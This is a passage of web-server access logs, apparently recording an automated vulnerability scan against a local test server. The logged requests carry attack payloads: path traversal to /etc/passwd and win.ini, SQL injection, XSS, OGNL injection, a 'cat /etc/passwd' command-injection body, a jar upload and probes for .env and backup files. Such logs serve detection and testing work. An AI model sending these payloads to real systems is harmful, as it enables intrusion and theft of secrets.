(Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?page=social-metrics-tracker-export&smt_download_export_file=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tests/generate.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.003","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?author=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"_authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cs/ContentServer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.231","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET //css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\x5Cwin.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.010","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.003","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/Home/login/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/easy-wp-smtp/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /seeyon/thirdpartyController.do.css/..;/ajax.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /get_dkey.php?user=admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /main.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2e/WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-mail-smtp-pro/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /editor/ckeditor/samples/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"username=admin&password={{admin}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"--8ce4b16b22b58894aa86c421e8759df3\x0D\x0AContent-Disposition: form-data; name=\x22jarfile\x22;filename=\x22poc.jar\x22\x0D\x0AContent-Type:application/octet-stream\x0D\x0A\x0D\x0A 297MTvrSugdarE7U9nrFFVL1sE7\x0D\x0A--8ce4b16b22b58894aa86c421e8759df3--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /jars/upload HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.210","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"Password=297MTkbgEG9cqgKmMeSxMhRHjf2&ConfirmPassword=297MTkbgEG9cqgKmMeSxMhRHjf2&RememberMe=true&__RequestVerificationToken={{csrf}}&RememberMe=false","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /account/register HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.215","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"http://127.0.0.1/account/register", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/login?redirect=%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.development.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"c\x02\x00H\x00\x04","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /mifs/.;/services/LogService HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"https://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/admin/cores?wt=json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /users/sign_in HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"_IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJ7e3VzZXJuYW1lfX0ifX0=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.047","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /configuration HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docpicker/internal_proxy/http/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /installer-log.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0a/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/wordpress_sso/pages/index.php?wordpress_user=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ckeditor/samples/sample_posteddata.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common/download/resource?resource=/profile/../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.tugboat HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"notdelay=true&command=cat /etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cli.php?a=shell HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dbconsole/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.prod HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /__ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wps/PA_WCM_Authoring_UI/proxy/http/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /themes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common/download/resource?resource=/profile/../../../../Windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0d/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /authenticationendpoint/297mtpzu77ridbidigfryor414y.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.212","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /editor/ckeditor/samples/sample_posteddata.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plus/carbuyaction.php?dopost=return&code=../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", 